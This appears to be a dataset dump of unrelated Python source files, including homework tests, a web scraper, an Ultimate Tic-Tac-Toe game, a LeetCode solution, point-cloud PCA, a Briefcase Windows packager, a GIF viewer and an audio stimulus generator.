hw5.oneD_parabola(-2.5, self.f)\n y1b = hw5.oneD_parabola(1.5, self.f)\n\n assert y1a - y1a_expect == 0\n assert y1b - y1b_expect == 0\n\n def test_step2(self):\n # Create expected values\n x2a_expect = -2.41284\n x2b_expect = 1.587155\n\n y2a_expect = 1.777444\n y2b_expect = 1.277444\n\n # Calculate the values\n theta = np.radians(self.theta)\n x2a, y2a = hw5.step2(-2.5, 0.78125, theta)\n x2b, y2b = hw5.step2(1.5, 0.28125, theta)\n tol = 0.00001\n\n assert funcs.is_near(x2a_expect, x2a, tol)\n assert funcs.is_near(x2b_expect, x2b, tol)\n assert funcs.is_near(y2a_expect, y2a, tol)\n assert funcs.is_near(y2b_expect, y2b, tol)\n\n def test_step3_twoD(self):\n # Create expected values\n x3a_expect = -1.652\n x3b_expect = 2.436329\n\n y3a_expect = 0.251254\n y3b_expect = 0.632374\n\n # Calculate the values\n x3a, y3a = hw5.step3_twoD(-2.5, 0.78125, 2)\n x3b, y3b = hw5.step3_twoD(1.5, 0.28125, 2)\n tol = 0.001\n\n assert funcs.is_near(x3a_expect, x3a, tol)\n assert funcs.is_near(x3b_expect, x3b, tol)\n assert funcs.is_near(y3a_expect, y3a, tol)\n assert funcs.is_near(y3b_expect, y3b, tol)\n\n # Test that the line is tangent\n assert funcs.is_near((y3a-0.78125)/(x3a+2.5), (-2.5)/(2*self.f), tol)\n assert funcs.is_near((y3b-0.28125)/(x3b-1.5), (1.5)/(2*self.f), tol)\n\n def test_step4(self):\n # Create expected values\n x4a_expect = -1.97\n x4b_expect = 1.148876\n\n y4a_expect = 1.62924\n y4b_expect = 1.21758\n\n # Calculate the values\n x4a, y4a = hw5.step4(-2.5, 0.78125, -1.652, 0.251254)\n x4b, y4b = hw5.step4(1.5, 0.28125, 2.436329, 0.632374)\n tol = 0.0001\n\n assert funcs.is_near(x4a_expect, x4a, tol)\n assert funcs.is_near(x4b_expect, x4b, tol)\n assert funcs.is_near(y4a_expect, y4a, tol)\n assert funcs.is_near(y4b_expect, y4b, tol)\n\n # Test that it is normal to the tangent vector\n dota = ((-1.652 + 2.5)*(-1.97 + 2.5) +\n (0.251254 - 0.78125)*(1.62924 - 0.78125))\n dotb = ((2.436329-1.5)*(1.148876-1.5) +\n (0.632374 - 0.28125)*(1.21758 - 0.28125))\n\n assert funcs.is_near(dota, 0, tol)\n assert funcs.is_near(dotb, 0, tol)\n\n def test_step5(self):\n # Create the expected values\n x5a_expect = -1.6427456\n x5b_expect = 0.7793\n\n y5a_expect = 1.2961\n y5b_expect = 0.9745\n\n # Calculate the values\n x5a, y5a = hw5.step5(-2.5, 0.78125, -2.41284, 1.777444, -1.97, 1.62924)\n x5b, y5b = hw5.step5(1.5, 0.28125, 1.587155, 1.277444, 1.148876, 1.21758)\n tol = 0.001\n\n assert 
funcs.is_near(x5a_expect, x5a, tol)\n assert funcs.is_near(x5b_expect, x5b, tol)\n assert funcs.is_near(y5a_expect, y5a, tol)\n assert funcs.is_near(y5b_expect, y5b, tol)\n\n def test_plane_intercept(self):\n # Create the expected values\n xa_expect = -0.4707122\n xb_expect = -0.28681\n\n # Calculate the values\n xa = hw5.plane_intercept(-2.5, 0.78125, -1.6427456, 1.2961, 2)\n xb = hw5.plane_intercept(1.5, 0.28125, 0.7793, 0.9745, 2)\n tol = 0.001\n\n assert funcs.is_near(xa_expect, xa, tol)\n assert funcs.is_near(xb_expect, xb, tol)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"notes/solar_energy_utilization/hw/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"57855665","text":"'''\nCreated on 2018. 8. 30.\n\n@author: sjc\n\n10~1000까지 각 숫자 분해하여 곱하기의 전체 합 구하기\n\n예로, 10~15까지의 각 숫자 분해하여 곱하기의 전체 합은 다음과 같다.\n\n10 = 1 * 0 = 0\n11 = 1 * 1 = 1\n12 = 1 * 2 = 2\n13 = 1 * 3 = 3\n14 = 1 * 4 = 4\n15 = 1 * 5 = 5\n\n그러므로, 이 경우의 답은 0+1+2+3+4+5 = 15\n'''\n\ndef sum():\n a = 0\n c = 1\n for i in range(10, 16): \n b = [int(x) for x in str(i)] \n print(\"b>>>\"+str(b)) \n for x in b:\n c = x * c\n print(\"x>>>\"+str(x)) \n print(\"c>>>\"+str(c)) \n a = a + c\n c = 1\n return a\n \n \nprint(sum())\n\n\n#result = [c * 3 for c in clist if (c % 2) == 1]\n#c = [k for k in word if k not in 'aot']\n\n\n\n\n \n\n","sub_path":"reBasic2018/basic/test/algorism01.py","file_name":"algorism01.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"237500892","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport xlsxwriter\nfrom time import sleep\nimport random\n\n\ndef get_links(html, row):\n soup = BeautifulSoup(html, 'html.parser')\n block_with_items = soup.find(class_='js-catalog_serp')\n items_in_block = block_with_items.find_all(class_='item_table')\n\n for item in items_in_block:\n try:\n title = item.find(class_='item-description-title').find('span')\n title = title.contents[0]\n\n try:\n price = item.find(class_='price')\n price = price.contents[0].lstrip()\n except AttributeError:\n price = ''\n\n try:\n data = item.find(class_='data').find('p')\n data = data.contents[0]\n except AttributeError:\n data = ''\n\n if row == 0:\n worksheet.write(row, 0, 'Название')\n worksheet.write(row, 1, 'Зарплата')\n worksheet.write(row, 2, 'Информация')\n else:\n worksheet.write(row, 0, title)\n worksheet.write(row, 1, price)\n worksheet.write(row, 2, data)\n row += 1\n print(title)\n except Exception as e:\n print(e)\n return row\n\n\ndef get_html(url):\n response = requests.get(url)\n return response.text\n\n\ndef get_last_page(paginator):\n print(paginator)\n all_pages = paginator.find_all(class_='pagination-page')\n for item in all_pages:\n if item.get_text() == 'Последняя':\n last = item.get('href')\n pattern = '\\d+$'\n last = re.findall(pattern, last)[0]\n return last\n\n\ndef get_paginator(html, url):\n soup = BeautifulSoup(html, 'html.parser')\n last_page = get_last_page(soup.find(class_='pagination-pages'))\n\n pages = []\n for page in range(1, int(last_page) + 1):\n pages.append(f'{url}?p={page}')\n return pages\n\n\nmain_url = 'https://www.avito.ru/sankt-peterburg/rezume/fitnes_salony_krasoty'\npages = get_paginator(get_html(main_url), main_url)\n\nworkbook = xlsxwriter.Workbook('Expenses01.xlsx')\nworksheet = workbook.add_worksheet()\nrow = 0\n\nfor page in 
pages:\n print(page)\n row = get_links(get_html(page), row)\n\nworkbook.close()\n","sub_path":"avito_parser.py","file_name":"avito_parser.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"235970867","text":"# -*- coding: utf-8 -*-\n\n# Nicolas, 2015-11-18\n# modifié par Laura Nguyen et Fatemeh Hamissi\n\nfrom __future__ import absolute_import, print_function, unicode_literals\nfrom gameclass import Game,check_init_game_done\nfrom spritebuilder import SpriteBuilder\nfrom players import Player\nfrom sprite import MovingSprite\nfrom ontology import Ontology\nfrom itertools import chain\nimport pygame\nimport glo\n\nimport random \nimport numpy as np\nimport sys\n\n\nfrom grid2D import *\n \n# ---- ---- ---- ---- ---- ----\n# ---- Main ----\n# ---- ---- ---- ---- ---- ----\n\ngame = Game()\n\n\ndef init(_boardname=None):\n global player,game\n # pathfindingWorld_MultiPlayer4\n name = _boardname if _boardname is not None else 'tictactoeBis'\n game = Game('Cartes/' + name + '.json', SpriteBuilder)\n game.O = Ontology(True, 'SpriteSheet-32x32/tiny_spritesheet_ontology.csv')\n game.populate_sprite_names(game.O)\n game.fps = 5 # frames per second\n game.mainiteration()\n game.mask.allow_overlaping_players = True\n #player = game.player\n\ndef ajout_successeurs(state, successeurs,terrains_jeu):\n (i,j)=state[-1]\n #si c'est une cas libre\n for case in terrains_jeu[j]:\n if case == 0:\n a=terrains_jeu[j].index(case)\n successeurs[state].append((a,j))\n return successeurs\n \n''' \n# détermine si c'est une position qui va nous faire gagner\ndef pos_gagne(state,terrains_jeu,player):\n i,j=state[-1]\n morpion=terrain[i]\n \n t=False\n \n if j==0 :\n \thoz = morpion[i][1]==player and morpion[i][2]==player\n \tvect = morpion[i][3]==player and morpion[i][6]==player\n \tdig = morpion[i][4]==player and morpion[i][8]==player\n \t\n if hoz or vect or dig:\n t=True\n \n if j==1 :\n \thoz = morpion[i][2]==player and morpion[i][0]==player\n \tvect = morpion[i][4]==player and morpion[i][7]==player\n \n if hoz or vect:\n t=True\n \n if j==2 :\n \thoz = morpion[i][1]==player and morpion[i][0]==player\n \tvect = morpion[i][5]==player and morpion[i][8]==player\n \tdig = morpion[i][4]==player and morpion[i][6]==player\n \t\n \tif hoz or vect or dig:\n t=True\n \t\n if j==3 :\n \thoz = morpion[i][4]==player and morpion[i][5]==player\n \tvect = morpion[i][0]==player and morpion[i][6]==player\n \t\n \tif hoz or vect or:\n t=True\n \n if j==4 :\n \thoz = morpion[i][3]==player and morpion[i][5]==player\n \tvect = morpion[i][1]==player and morpion[i][7]==player\n \tdig = morpion[i][0]==player and morpion[i][8]==player\n \tdig2 = morpion[i][2]==player and morpion[i][6]==player\n \t\n \tif hoz or vect or dig or dig2:\n t=True\n \n if j==5 :\n \thoz = morpion[i][4]==player and morpion[i][3]==player\n \tvect = morpion[i][2]==player and morpion[i][8]==player\n \t\n \tif hoz or vec:\n t=True\n \t\n if j==6 :\n \thoz = morpion[i][7]==player and morpion[i][8]==player\n \tvect = morpion[i][0]==player and morpion[i][3]==player\n \tdig = morpion[i][4]==player and morpion[i][2]==player\n \t\n \t\t\n \tif hoz or vec or dig:\n t=True\n \n if j==7 :\n \thoz = morpion[i][6]==player and morpion[i][8]==player\n \tvect = morpion[i][1]==player and morpion[i][4]==player\n\n \tif hoz or vec:\n t=True\n \t\n if j==8 :\n \thoz = morpion[i][6]==player and morpion[i][7]==player\n \tvect = morpion[i][5]==player and morpion[i][2]==player\n \tdig = 
morpion[i][4]==player and morpion[i][0]==player\n \t\n \tif hoz or vec or dig:\n t=True\n \n return t\n '''\n\ndef fh(state,j):\n if pos_gagne(state):\n nbr_vict_local[j]=nbr_vict_local[j]+1\n return 1\n else:\n return nbr_vict_local[j] \n \ndef alphabeta(state):\n \"\"\" implementation de alphabeta, version Russel & Norvig, Chapter 6\n \"\"\"\n v = maxValue(state,-inf,inf)\n return v\n \ndef maxValue(state,alpha,beta):\n if feuille(state): # si feuille on renvoie la valeur\n return valeur[state]\n v = -inf\n for s in successeurs[state]:\n print (\"étendu noeud \", s)\n v = max(v,minValue(s,alpha,beta))\n if v >= beta: # coupe beta, pas la peine d'étendre les autres fils\n print (\"coupe beta\")\n return v\n alpha = max(alpha,v) # mise à jour de alpha par MAX\n return v \n \ndef minValue(state,alpha,beta):\n if feuille(state): # si feuille on renvoie la valeur\n return valeur[state]\n v = inf\n for s in successeurs[state]:\n print (\"étendu noeud \", s)\n v = min(v,maxValue(s,alpha,beta))\n if v <= alpha: # coupe alpha, pas la peine d'étendre les autres fils\n print (\"coupe alpha\")\n return v\n beta = min(beta,v)\n return v\n \ndef feuille(state): # les feuilles n'apparaissent pas comme clés dans mon dictionnaire successeurs\n return state not in successeurs \n \ndef main():\n\n #for arg in sys.argv:\n iterations = 500 # default\n if len(sys.argv) == 2:\n iterations = int(sys.argv[1])\n print (\"Iterations: \")\n print (iterations)\n \n mur = [False] * 20\n vide= [False] + [True] * 17 + [False, False]\n first=[False, True,True,False, False,True, False, False, False, True,False,False,False,True,False,False,True,True, False, False]\n sec=[False, True,True,False,True,True,True, False, True,True,True,False,True,True,True,False,True,True, False, False]\n \n mat=np.array((mur,vide,vide,first,sec,vide,sec,first,sec,vide,sec,first,sec,vide,sec,first,vide,vide, mur, mur)) # matrice représentant la map\n\n init()\n\n \n\n \n #-------------------------------\n # Initialisation\n #-------------------------------\n \n players = [o for o in game.layers['joueur']]\n nbPlayers = len(players)\n scores = [0]*nbPlayers\n #fioles = {} # dictionnaire (x,y)->couleur pour les fioles\n \n \n # on localise tous les états initiaux (loc du joueur)\n initStates = [o.get_rowcol() for o in game.layers['joueur']]\n # print (\"Init states:\", initStates)\n \n \n # on localise tous les objets ramassables\n #goalStates = [o.get_rowcol() for o in game.layers['ramassable']]\n #print (\"Goal states:\", goalStates)\n \n # on localise tous les murs\n wallStates = [w.get_rowcol() for w in game.layers['obstacle']]\n # et la zone de jeu pour le tic-tac-toe\n tictactoeStates = [(x,y) for x in range(3,16) for y in range(3,16)]\n #print (\"Wall states:\", wallStates)\n # print(tictactoeStates)\n # les coordonnees des tiles dans la fiche\n tile_fiole_jaune = (19,1)\n tile_fiole_bleue = (20,1)\n \n # listes des objets fioles jaunes et bleues\n \n fiolesJaunes = [f for f in game.layers['ramassable'] if f.tileid==tile_fiole_jaune]\n fiolesBleues = [f for f in game.layers['ramassable'] if f.tileid==tile_fiole_bleue] \n all_fioles = (fiolesJaunes,fiolesBleues) \n fiole_a_ramasser = (0,0) # servira à repérer la prochaine fiole à prendre\n \n # renvoie la couleur d'une fiole\n # potentiellement utile\n \n def couleur(o):\n if o.tileid==tile_fiole_jaune:\n return 'jaune'\n elif o.tileid==tile_fiole_bleue:\n return 'bleue'\n \n \n #-------------------------------\n # Placement aleatoire d'une fioles de couleur \n 
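# (la fiole est posée au hasard sur une case libre, hors murs et hors zone de morpion)\n    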
#-------------------------------\n \n def put_next_fiole(j,t):\n o = all_fioles[j][t]\n \n # et on met cette fiole qqpart au hasard\n \n x = random.randint(1,19)\n y = random.randint(1,19)\n \n while (x,y) in tictactoeStates or (x,y) in wallStates: # ... mais pas sur un mur\n x = random.randint(1,19)\n y = random.randint(1,19)\n o.set_rowcol(x,y)\n # on ajoute cette fiole dans le dictionnaire\n #fioles[(x,y)]=couleur(o)\n \n game.layers['ramassable'].add(o)\n game.mainiteration()\n return (x,y)\n \n \n def get_path(noeudFinal, posInit):\n chemin = [] \n \n pere = noeudFinal\n while pere.etat != posInit:\n chemin.append(pere.etat)\n pere = pere.pere\n \n return reversed(chemin)\n\n def go_to_position(posPlayer, player, chemin):\n for pos in chemin:\n row = pos[0]\n col = pos[1]\n player.set_rowcol(row, col)\n \n game.mainiteration()\n\n posPlayer=(row,col)\n\n return posPlayer\n \n def update_scores(score, j, morpions, terrains_jeu, terrain):\n fin = False\n t = terrains_jeu[terrain] # dernier terrain où le joueur a joué \n v = False\n \n # lignes\n if t[0] == t[1] == t[2] == j: # 1ère ligne remplie\n v = True\n if t[3] == t[4] == t[5] == j:\n v = True\n if t[6] == t[7] == t[8] == j:\n v = True\n \n # colonnes\n if t[0] == t[3] == t[6] == j:\n v = True\n if t[1] == t[4] == t[7] == j:\n v = True\n if t[2] == t[5] == t[8] == j:\n v = True\n \n # diagonales\n if t[0] == t[4] == t[8] == j:\n v = True\n if t[2] == t[4] == t[6] == j:\n v = True\n \n if v: # le joueur a gagné le terrain\n morpions[terrain] = j\n v = False\n score += 1\n \n if terrain in [0, 1, 2] and morpions[0] == morpions[1] == morpions[2]: # 1ère lignée de terrain marquée\n v = True\n if terrain in [3, 4, 5] and morpions[3] == morpions[4] == morpions[5]:\n v = True\n if terrain in [6, 7, 8] and morpions[6] == morpions[7] == morpions[8]:\n v = True\n if terrain in [0, 3, 6] and morpions[0] == morpions[3] == morpions[6]: # 1ère colonne de terrain marquée\n v = True\n if terrain in [1, 4, 7] and morpions[1] == morpions[4] == morpions[7]:\n v = True\n if terrain in [2, 5, 8] and morpions[2] == morpions[5] == morpions[8]:\n v = True\n \n if v:\n fin = True\n \n \n return fin, score, morpions, terrains_jeu\n \n #-------------------------------\n # Boucle principale de déplacements, un joueur apres l'autre\n #-------------------------------\n \n posPlayers = initStates\n print(posPlayers)\n tour = 0 \n j = 1 # le joueur 0 commence\n # on place la premiere fiole jaune \n\n fiole_a_ramasser = put_next_fiole(0,tour) \n\n morpions = [0] * 9 # les 9 terrains de jeu, 0: match non terminé, 1: joueur 1 a gagné, 2: joueur 2 a gagné\n terrains_jeu = [\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0]\n ] # terrains de jeux, 0: case libre, 1: case occupée par le joueur 1, 2:case occupée par le joueur 2\n \n terrain = random.randint(0,8) # terrain où va jouer le premier joueur \n \n dict_terrains = {\n (0,0): (4, 4), (0,1): (4,5) ,(0,2): (4,6), (0,3): (5, 4), (0,4): (5, 5), (0,5): (5, 6), (0,6): (6, 4), (0,7): (6,5),(0,8): (6, 6),\n (1,0): (4, 8), (1,1): (4,9) ,(1,2): (4,10), (1,3): (5, 8), (1,4): (5, 9), (1,5): (5, 10), (1,6): (6, 8), (1,7): (6,9),(1,8): (6, 10),\n (2,0): (4, 12), (2,1): (4,13) ,(2,2): (4,14), (2,3): (5, 12), (2,4): (5, 13), (2,5): (5, 14), (2,6): (6, 12), (2,7): (6,13),(2,8): (6, 14),\n (3,0): (8, 4), 
(3,1): (8,5) ,(3,2): (8,6), (3,3): (9, 4), (3,4): (9, 5), (3,5): (9, 6), (3,6): (10, 4), (3,7): (10,5),(3,8): (10, 6),\n (4,0): (8, 8), (4,1): (8,9) ,(4,2): (8,10), (4,3): (9, 8), (4,4): (9, 9), (4,5): (9, 10), (4,6): (10, 8), (4,7): (10,9),(4,8): (10, 10), \n (5,0): (8, 12), (5,1): (8,13) ,(5,2): (8,14), (5,3): (9, 12), (5,4): (9, 13), (5,5): (9, 14), (5,6): (10, 12), (5,7): (10,13),(5,8): (10, 14),\n (6,0): (12, 4), (6,1): (12,5) ,(6,2): (12,6), (6,3): (13, 4), (6,4): (13, 5), (6,5): (13, 6), (6,6): (14, 4), (6,7): (14,5),(6,8): (14, 6),\n (7,0): (12, 8), (7,1): (12,9) ,(7,2): (12,10), (7,3): (13, 8), (7,4): (13, 9), (7,5): (13, 10), (7,6): (14, 8), (7,7): (14,9),(7,8): (14, 10),\n (8,0): (12, 12), (8,1): (12,13) ,(8,2): (12,14), (8,3): (13, 12), (8,4): (13, 13), (8,5): (13, 14), (8,6): (14, 12), (8,7): (14,13),(8,8): (14, 14)\n }\n # dictionnaire (terrain, case du terrain) => case dans mat\n for i in range(iterations):\n print(\"Position joueur 0 : \", posPlayers[j])\n print(\"Position fiole : \", fiole_a_ramasser)\n \n p2 = ProblemeGrid2D(posPlayers[j],fiole_a_ramasser,mat,'manhattan')\n noeudFinal = probleme.astar(p2)\n chemin = get_path(noeudFinal, posPlayers[j])\n posPlayers[j] = go_to_position(posPlayers[j], players[j], chemin)\n o = players[j].ramasse(game.layers) # on ramasse la fiole \n game.mainiteration()\n print (\"Objet de couleur \", couleur(o), \" trouvé par le joueur \", j)\n \n \n '''\n while True: # tant qu'on tombe sur une case occupée\n random_case = random.randint(0,8) # case du terrain où va jouer le joueur \n if (terrains_jeu[terrain][random_case] == 0): # case libre\n break\n \n '''\n pos_but = dict_terrains[(terrain, random_case)] # la case où doit aller le personnage\n p2 = ProblemeGrid2D(posPlayers[j],pos_but,mat,'manhattan')\n noeudFinal = probleme.astar(p2)\n \n chemin = get_path(noeudFinal, posPlayers[j])\n \n posPlayers[j] = go_to_position(posPlayers[j], players[j], chemin)\n\n players[j].depose(game.layers)\n game.mainiteration()\n print(\"Le joueur \", j, \" a déposé sa fiole en \", pos_but)\n terrains_jeu[terrain][random_case] = j+1 # la case est marquée\n\n fin, scores[j], morpions, terrains_jeu = update_scores(scores[j], j+1, morpions, terrains_jeu, terrain) # maj des scores \n \n if fin: # l'un des joueurs à gagner\n break\n # on active le joueur suivant\n # et on place la fiole suivante\n \n \n fiole_a_ramasser=put_next_fiole(j,tour) \n terrain = random_case # prochain terrain\n \n if not 0 in morpions: # tous les match sont terminés\n print(\"Partie terminée\")\n break\n game.mainiteration()\n while morpions[terrain] != 0: # terrain déjà gagné par un des deux joueurs\n terrain = random.randint(0, 8) # choix aléatoire d'un autre terrain\n\n #break\"\"\"\n j = (j+1)%2 \n if j == 0:\n tour+=1\n\n \n print(\"Scores : \", scores)\n if scores[0] > scores[1]:\n print(\"Le joueur 1 a gagné\")\n elif scores[0] < scores[1]:\n print(\"Le joueur 2 a gagné\")\n else:\n print(\"Egalité\")\n # pygame.quit()\n \n \n\nif __name__ == '__main__':\n main()\n \n\n\n","sub_path":"pySpriteWorld-forStudents/UltimateTicTacToe-new.py","file_name":"UltimateTicTacToe-new.py","file_ext":"py","file_size_in_byte":15377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"378925118","text":"'''\n\nDescription:\n\nWrite a function that reverses a string. 
The input string is given as an array of characters char[].\n\nDo not allocate extra space for another array, you must do this by modifying the input array in-place with O(1) extra memory.\n\nYou may assume all the characters consist of printable ascii characters.\n\n \n\nExample 1:\n\nInput: [\"h\",\"e\",\"l\",\"l\",\"o\"]\nOutput: [\"o\",\"l\",\"l\",\"e\",\"h\"]\n\n\n\nExample 2:\n\nInput: [\"H\",\"a\",\"n\",\"n\",\"a\",\"h\"]\nOutput: [\"h\",\"a\",\"n\",\"n\",\"a\",\"H\"]\n\n'''\n\n\n\nfrom typing import List\n\n\nclass Solution:\n def reverseString(self, s: List[str]) -> None:\n \n size = len(s)\n\t\t\n\t\t# reverse string by mirror image\n for i in range(size//2):\n s[i], s[-i-1] = s[-i-1], s[i]\n\n\n\n# n : the length of input char array, s\n\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of linear iteration, which is of O( n )\n\n## Space Complexity: O( 1 )\n#\n# The overhead in space is the storage for temporary variable, which is of O( 1 )\n\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'test_char_array' )\n\ndef test_bench():\n\n test_data = [\n TestEntry( test_char_array = [\"h\",\"e\",\"l\",\"l\",\"o\"] ),\n TestEntry( test_char_array = [\"H\",\"a\",\"n\",\"n\",\"a\",\"h\"] ),\n ]\n\n # expected output:\n '''\n ['o', 'l', 'l', 'e', 'h']\n ['h', 'a', 'n', 'n', 'a', 'H']\n '''\n\n for t in test_data:\n\n Solution().reverseString( t.test_char_array )\n print(t.test_char_array)\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","sub_path":"2020_June_Leetcode_30_days_challenge/Week_1_Reverse String/by_mirror_image.py","file_name":"by_mirror_image.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"510438650","text":"import open3d as o3d\r\nimport numpy as np\r\ndef pca_compute(data, sort=True):\r\n average_data = np.mean(data, axis=0)\r\n decentration_matrix = data - average_data\r\n H = np.dot(decentration_matrix.T, decentration_matrix)\r\n eigenvectors, eigenvalues, eigenvectors_T = np.linalg.svd(H)\r\n if sort:\r\n sort = eigenvalues.argsort()[::-1]\r\n eigenvectors = eigenvectors[:, sort]\r\n return eigenvectors, average_data\r\nif __name__ == '__main__':\r\n pcd = o3d.io.read_point_cloud(\"Original.pcd\")\r\n points = np.asarray(pcd.points)\r\n v, c = pca_compute(points)\r\n coefficients = v[:, 2]\r\n A = coefficients[0]\r\n B = coefficients[1]\r\n C = coefficients[2]\r\n D = -(A * c[0] + B * c[1] + C * c[2])\r\n print('Equation:%.6f * x + %.6f * y + %.6f*z + %.6f = 0' % (A, B, C, D))\r\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188324606","text":"import os\nimport distutils.command.install_scripts as orig\nfrom pkg_resources import Distribution, PathMetadata\nimport shutil\nimport subprocess\nimport sys\n\nfrom .app import app\n\n\nclass windows(app):\n description = \"Create a Windows installer to wrap this project\"\n\n def finalize_options(self):\n # Copy over all the options from the base 'app' command\n finalized = self.get_finalized_command('app')\n for attr in ('formal_name', 'organization_name', 'bundle', 'icon', 'guid', 'splash', 'download_dir'):\n if getattr(self, attr) is None:\n setattr(self, attr, getattr(finalized, attr))\n\n super(windows, self).finalize_options()\n\n # Set platform-specific options\n self.platform = 'Windows'\n self.support_project = 
\"pybee/Python-Microsoft-Support\"\n\n if self.dir is None:\n self.dir = 'windows'\n\n self.resource_dir = self.dir\n self.support_dir = os.path.join(self.dir, 'python')\n\n iconfile = '%s.ico' % self.icon\n self.icon_filename = os.path.join(self.app_dir, self.distribution.get_name() + os.path.splitext(iconfile)[1])\n\n def install_icon(self):\n shutil.copyfile('%s.ico' % self.icon, self.icon_filename)\n\n def install_splash(self):\n raise RuntimeError(\"Windows doesn't support splash screens.\")\n\n def find_support_pkg(self):\n version = \"%s.%s.%s\" % sys.version_info[:3]\n return 'https://www.python.org/ftp/python/%s/python-%s-embed-amd64.zip' % (version, version)\n\n def install_extras(self):\n print(\" * Creating application link...\")\n subprocess.Popen([\"powershell\", \"-File\", \"make_link.ps1\"], cwd=os.path.abspath(self.dir)).wait()\n os.remove(os.path.join(os.path.abspath(self.dir), 'make_link.ps1'))\n","sub_path":"briefcase/windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"646258652","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n__author__ = '@l0x6c'\n__version__ = '0.1.3'\n\nimport os\nimport sys\n\nfrom PyQt4.QtCore import Qt, QSize\nfrom PyQt4.QtGui import QMainWindow, QApplication, QLabel, QMovie\n\nclass GIFLabel(QLabel):\n def __init__(self, file_name=None):\n super(GIFLabel, self).__init__()\n\n if file_name != None:\n self.set_movie(file_name)\n\n def set_movie(self, file_name):\n movie = QMovie(file_name)\n movie.start()\n\n self.setMovie(movie)\n size = movie.currentImage().size()\n\n width = size.width()\n height = size.height()\n\n self.size = (width, height)\n\nclass Lain(QMainWindow):\n def __init__(self, path):\n super(Lain, self).__init__()\n\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.setAttribute(Qt.WA_TranslucentBackground)\n\n self.gif_files = [\n os.path.join(path, item) for item in sorted(os.listdir(path))\n if item.split('.')[-1].lower() == 'gif'\n ]\n\n self.gif_label = GIFLabel()\n self.setCentralWidget(self.gif_label)\n\n self.current_gif = -1\n self.next_gif()\n\n def set_gif(self, file_name):\n self.gif_label.set_movie(file_name)\n self.resize(*self.gif_label.size)\n\n def next_gif(self):\n self.current_gif += 1\n\n if self.current_gif not in range(0, len(self.gif_files)):\n self.current_gif = 0\n\n self.set_gif(self.gif_files[self.current_gif])\n\n def previous_gif(self):\n self.current_gif -= 1\n\n if self.current_gif not in range(0, len(self.gif_files)):\n self.current_gif = len(self.gif_files) - 1\n\n self.set_gif(self.gif_files[self.current_gif])\n\n def mousePressEvent(self, event):\n self.x = event.pos().x()\n self.y = event.pos().y()\n\n def mouseReleaseEvent(self, event):\n self.x = None\n self.y = None\n\n def mouseMoveEvent(self, event):\n deltax = event.pos().x() - self.x\n deltay = event.pos().y() - self.y\n\n x = self.pos().x() + deltax\n y = self.pos().y() + deltay\n\n self.move(x, y)\n\n def keyPressEvent(self, event):\n key_dict = {\n 16777216: sys.exit, # ESC key\n 16777236: self.next_gif, # Right arrow\n 16777234: self.previous_gif # Left arrow\n }\n\n return key_dict.get(event.key(), lambda: None)()\n\nif __name__ == '__main__':\n if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:\n print('Usage: {} {} PATH'.format(sys.executable, sys.argv[0]))\n sys.exit()\n\n app = QApplication([])\n lain = Lain(sys.argv[1]); lain.show()\n 
sys.exit(app.exec_())","sub_path":"lain.py","file_name":"lain.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"118499259","text":"from scipy.io.wavfile import write\n\nimport sequence_generation as seqgen\nimport tone_generation as tonegen\nimport numpy as np\n\nFs = 44100 \ntone_duration = 1/6\nn = 30\nn_repetitions = 5\n\nspectral_conditions = ['high', 'low', 'passive']\n\ndef generate_stimulus(target_band='high', Fs=Fs, tone_duration=tone_duration, distractor_volume=1):\n \n target_trials, targets = seqgen.generate_single_band(n_repetitions=n_repetitions, n=n)\n distractor_trials, distractors = seqgen.generate_single_band(n_repetitions=n_repetitions, n=n)\n\n if target_band == 'high':\n waveform = tonegen.generate_tone_sequence(distractor_trials, target_trials, target_band, distractor_volume)\n elif target_band == 'low':\n waveform = tonegen.generate_tone_sequence(target_trials, distractor_trials, target_band, distractor_volume)\n elif target_band == 'passive':\n waveform = tonegen.generate_tone_sequence(distractor_trials, target_trials, target_band, distractor_volume)\n\n target_list = list([int(np.floor(x*8*tone_duration*1000)+1000) for x in targets])\n distractor_list = list([int(np.floor(x*8*tone_duration*1000)+1000) for x in distractors])\n json_output = '{\\n\\t\\\"targetData\\\":' + str(target_list).replace(' ', '') + ',\\n\\t\\\"distractorData\\\":' + str(distractor_list).replace(' ', '') + '\\n}'\n \n return(waveform, json_output)\n\nn_blocks = int(input(\"How many blocks for each frequency? \"))\n\nsilence = np.zeros(44100) # this is a hack because sound presentation in PsychoPy cuts off the first click\nfor i in spectral_conditions:\n for j in range(n_blocks):\n stimulus, json = generate_stimulus(target_band=i)\n stimulus = np.asarray(stimulus, dtype='float32')\n click = np.ones(20)\n trial_length = 